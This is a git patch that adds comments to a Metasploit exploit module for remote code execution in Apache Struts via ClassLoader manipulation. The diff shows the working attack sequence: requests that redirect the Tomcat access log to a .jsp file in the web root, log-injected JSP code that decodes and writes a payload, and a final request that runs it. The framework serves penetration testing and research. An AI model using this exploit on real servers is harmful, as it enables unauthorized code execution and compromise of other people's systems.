From b2c2245aff0eba40a98ebda7db67c97271d6cfcc Mon Sep 17 00:00:00 2001
From: julianvilas <julian.vilas@gmail.com>
Date: Tue, 29 Apr 2014 11:24:17 +0200
Subject: [PATCH] Add comments

---
 .../multi/http/struts_code_exec_classloader.rb      | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb
index d6f11c9fac..8d3743e644 100644
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -90,10 +90,12 @@ class Metasploit3 < Msf::Exploit::Remote
     date_format = rand_text_numeric(1+rand(4))
 
     vprint_status("#{peer} - Modifying class loader")
-    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT")
-    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}")
-    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp")
-    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}")
+
+    # Modifies classLoader parameters
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") # Filename
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension
+    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix"
 
     jsp_file = prefix_jsp
     jsp_file << date_format
@@ -103,6 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     sleep(3)
 
+    # Inexistent URI that logs on previously created log file (with ".jsp" suffix) 
     uri = String.new(datastore['TARGETURI'])
     uri << rand_text_alphanumeric(4+rand(4))
     uri << "?"
@@ -115,6 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
     payload_file = rand_text_alphanumeric(4+rand(4))
     register_files_for_cleanup("#{payload_file}", "#{jsp_file}")
 
+    # Commands to be logged
     exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>")
     exec_cmd(uri, "<%@ page import=\"sun.misc.BASE64Decoder\" %>")
     exec_cmd(uri, "<%@ page import=\"java.io.File\" %>")
@@ -133,6 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}")
 
+    # Access the log (with ".jsp" extension) in order to execute the JSP notation logged sentences
     uri = "/"
     uri << jsp_file